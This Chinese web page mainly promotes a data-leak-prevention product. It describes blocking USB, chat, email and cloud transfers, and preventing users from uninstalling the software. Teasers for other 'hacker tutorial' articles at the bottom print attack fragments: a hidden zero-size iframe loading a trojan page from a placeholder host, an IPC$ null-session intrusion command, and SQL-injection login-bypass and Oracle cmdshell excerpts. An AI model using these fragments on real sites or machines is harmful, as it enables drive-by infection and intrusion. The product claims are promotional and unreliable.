怎样禁止电脑连接U盘、如何禁止电脑数据拷贝、限制电脑数据外发

所属分类: 网络安全 / 黑客教程 阅读数: 210
收藏 0 赞 0 分享

计算机技术和网络技术的高速发展,给我们的生活带来了极大的便利,同时也带来了很多麻烦,尤其在工作中。对于某些特殊行业,有很多重要文件是禁止用户随意拷贝出去的。例如:设计图纸、调研数据、源代码、策划方案、画册源文件等等,这些机密文件一旦泄露,可能会给企业带来不可估量的损失。

对于工作中需要保护的电脑文件,尤其是涉及企业重要商业机密的文件,我们既要允许员工使用,又要防止其私自拷贝,或者挪作他用,既要允许员工使用互联网,又要控制某些上网行为,这是最让企业网络管理人员头疼的地方。

于是,有些企业把机箱锁起来,这样用户就不能随便使用U盘了,但是这个成本很高,管理起来也不方便,日常工作也需要有文件拷贝往来。而且,现在网盘、邮件、QQ、论坛、博客、淘宝旺旺、亲淘、53客服、商务通等等,都可以传文件,还有蓝牙、光驱、红外,根本无从封堵!最简单的办法就是禁止员工上网,或者干脆不用电脑工作,回归最原始的纸笔办公时代。

有一款软件叫“第三只眼”,这款软件需要在被控电脑上安装软件,可以控制usb端口传文件,但唯独不能禁止手机连接电脑usb拷贝文件,这基本上就等于没有封堵,现在手机SD卡的容量越来越大,完全可以充当U盘或者移动硬盘使用,而且传输速度非常快。

在逛论坛的时候,有网友推荐了一款软件叫“大势至电脑文件防泄密系统”,这款软件还不错,基本上封堵了全部的文件传输途径,算是很人性化的了。

大势至电脑文件防泄密系统是一款专业管理电脑文件传输途径的管理工具,可以封堵一切常用的文件传输方式,最大程度的降低企业商业机密外泄的风险。大势至电脑文件防泄密系统一方面可以禁止电脑文件通过USB端口发送,例如:禁止电脑识别U盘;禁止电脑识别手机;禁止电脑识别SD卡;禁止电脑识别移动硬盘;设置特定U盘;设置只允许从电脑向U盘拷贝文件,禁止U盘向电脑拷贝文件;设置只允许U盘向电脑拷贝文件,禁止电脑向U盘拷贝文件;从电脑向U盘拷贝文件需要输入管理员密码,禁止电脑识别USB光驱等。

另一方面,系统还可以禁止电脑文件通过一切网络传输途径发送出去,例如:禁止QQ发送电脑文件、禁止微信发送电脑文件、禁止QQ群发送电脑文件、禁止QQ会话组发送电脑文件、禁止邮箱发送电脑文件、禁止网盘发送电脑文件、禁止云盘发送电脑文件、禁止FTP发送电脑文件、禁止微博博客发送电脑文件等。

此外,系统还可以禁止蓝牙发送电脑文件、禁止红外传输电脑文件、禁止使用局域网通讯工具、禁止使用远程桌面、禁止使用虚拟机发送电脑文件、禁止电脑设置共享、禁止网线直连传输电脑文件等。

大势至电脑文件防泄密系统(下载试用:http://www.grabsun.com/278_50.html)这款软件试用版可以体验全功能,这一点还不错。可以点击上面的链接下载最新试用版,在这里要强调一点,一定要在官网下载,否则可能下载了其他盗版、破解版之类的,导致无法卸载、电脑闪屏、U盘被写保护等问题。试用版支持全功能测试,试用时间是7天。

软件下载后,直接双击安装,整个过程还不到5秒,太快了点吧。安装后立即弹出页面,可以勾选即将要控制的项目。于我而言,要求基本如下:

1、指定某些U盘拷贝电脑中的文件,除此之外任何usb存储设备都无法连接电脑拷贝资料,包括手机或者SD卡等;

2、禁用光驱(包括外接的)、软驱;

3、禁止蓝牙、红外;

4、禁止发邮件、禁止使用网盘、禁止qq传文件、禁止手机电脑互传等。

主要就是以上这些要求,如果没有想到的,以后再补充修改。通过软件,我是这样设置的,如下图:

其中添加特定U盘这一项,先要插上U盘,这里会自动识别U盘序列号,点击选中,即添加成功,那么这台电脑就只识别这个U盘了,其他任何U盘连接电脑,都无法拷贝资料。
全部设置完成后,点“后台运行”,不要点“退出软件”,这样每次开机就会自动启动了,就这样轻松解决了这么多复杂而又矛盾的需求了。

那么还有一点,需要注意的是,这款软件要安装在被控电脑上,一旦被用户关闭或者卸载了怎么办呢?在软件界面右上角,禁用注册表、禁用安全模式等等,这些选项几乎可以封堵大部分的卸载或者关闭途径,按自己的需求勾选。

大势至电脑文件防泄密软件可以最大程度的保护电脑文件安全,不像一些加密软件,在保护电脑文件的同时,还会损坏文件本身。这款软件安装操作极其简单,适合各种专业和岗位的用户使用,不但功能划分精细,管理方式灵活多变,安全防御机制也是同类产品中做的最好的,有兴趣的网友可以下载体验,非常不错!!!

大势至公司可以独家提供从局域网网络行为管理、电脑资料防止泄密管控和信息安全防护一站式解决方案
聚生网管网络管理系统下载 是一款专门的办公室电脑监控软件、局域网网络控制软件,可以禁止网络游戏、禁止上班炒股、禁止P2P软件下载、禁止在线看视频、局域网限制别人网速等,以及绑定局域网IP和MAC地址,防止ARP攻击行为等。
大势至文件共享管理软件下载 是一款专门的共享文件夹访问日志记录软件、服务器共享文件访问权限设置软件,可以实现只让读取共享文件而禁止复制共享文件、只让打开共享文件而禁止另存为本地和禁止拖拽共享文件以及只让修改共享文件而禁止删除共享文件,保护服务器共享文件安全,防止共享文件越权访问。
大势至企业数据泄密防护系统下载 是一款专门保护电脑文件安全,防止U盘复制文件、禁用USB端口的软件,同时还可以屏蔽邮件附件、禁止登录网盘上传文件、禁止FTP软件发送文件、禁止微信发送文件、禁止QQ发送文件等,防止各种途径泄密。
大势至局域网接入认证系统下载 是一款专业的局域网网络准入控制系统,有效阻止外来电脑接入局域网、禁止外来上网上网、禁止非单位电脑访问局域网共享文件、隔离局域网电脑、进行IP和MAC地址绑定、禁止修改IP地址等,保护局域网安全。

更多精彩内容其他人还在看

汗颜:黑客居然这样保护自己的电脑

     看了你昨天的留言,我才知道原来木马可以用这么多方式传播呀。那我想问你一件事,常在河边走,哪有不湿鞋,你经常黑别人,难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢?   就像你说的那样,我也中过木马,也同样被黑过,我的经验
收藏 0 赞 0 分享

高手支招:通过进程抓马

 对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。   实例一:和进程的“表
收藏 0 赞 0 分享

ASP注入万能登陆密码

《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:   程序代码   <%   username=trim(Request.Form("username"))   password=trim(Reque
收藏 0 赞 0 分享

容易被黑客攻击的10个漏洞

  应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散,但它们也同样会造成很多问题,从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是一件简单的事,而不幸的是对应用程序的攻击是非常容易的
收藏 0 赞 0 分享

139入侵简易教程

  net use\192.168.0.1ipc$Content$nbsp;"" /user:administrator   提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。   首先,连接的命令
收藏 0 赞 0 分享

有史以来最牛的服务器反黑全集

 Win2k的缺省安装很容易被攻击者取得帐号列表,即使安装了最新的Service ack也是如此。   方案一   1.打补丁   微软的作风就是三天一小补,五天一大补,漏洞太多,补一点就好一点,使用“开始-WindowsUpdate"然后把所有
收藏 0 赞 0 分享

网页挂马方法和技巧大汇总

1,挂马的N种方法   (1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>
收藏 0 赞 0 分享

黑客快速入门

今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,   包括它的类型,用户列表,目录,端口,漏洞等等。   首先我们我们要找一台主机来练手,随便挑吧!www.dddd.com(乱说的)第一部,呵呵,   先在ie里看看吧,mmmm.....做的还行,挺精致的!主
收藏 0 赞 0 分享

秒杀Google浏览器

用Google浏览器浏览此篇文章,并点击下面的字符:   EVIL:%   是不是很爽,^_^。
收藏 0 赞 0 分享

犀利的 oracle 注入技术

犀利的 oracle 注入技术   原文发表在黑客手册   linx 2008.1.12   介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。   以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS
收藏 0 赞 0 分享
查看更多